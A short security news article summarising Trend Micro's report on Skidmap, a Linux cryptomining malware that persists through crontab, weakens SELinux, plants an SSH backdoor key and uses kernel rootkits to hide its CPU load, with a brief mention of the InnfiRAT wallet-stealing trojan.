Skid map, a Linux malware, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar.

Skidmap then installs multiple malicious binaries, the first minimizing the infected machine’s security settings so that it can begin mining cryptocurrency unhindered. TrendMicro warns that Skidmap “demonstrates the increasing complexity of recent cryptocurrency-mining threats”, pointing out that it is “notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar”.

The infection chain sees the Skidmap miner installing itself via crontab, then the malicious code downloads and executes the main binary. The malware decreases the security settings of the target systems by configuring the Security-Enhanced Linux (SELinux) module to the permissive mode or by disabling the SELinux policy and setting selected processes to run in confined domains. The miner also set up backdoor access to the infected system.

Skidmap also provides attackers with backdoor access to the infected machine.

“Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication.” continues the report.

In particular, one rootkit will fake network traffic and CPU-related statistics to make it appear that the machine is clean. This will include the creation of sham traffic involving particular ports, IP addresses, CPU loads and processes. A CPU with a heavy load is a well-known indicator of cryptocurrency mining as the power used to work out the mathematical puzzles required to secure digital coins is generally high. In Skidmap’s case, traffic information is faked to make CPU usage always appear low.

In addition, the malware is equipped with modules able to monitor cryptocurrency mining processes, hide specific files, and set up malicious cron jobs for executing other malicious files. The use of rootkits is an interesting development in the world of Linux-based cryptocurrency mining. Another recently-discovered Trojan sample, called InnfiRAT, was found to contain functionality specifically designed for the theft of cryptocurrency-related wallet credentials on infected machines.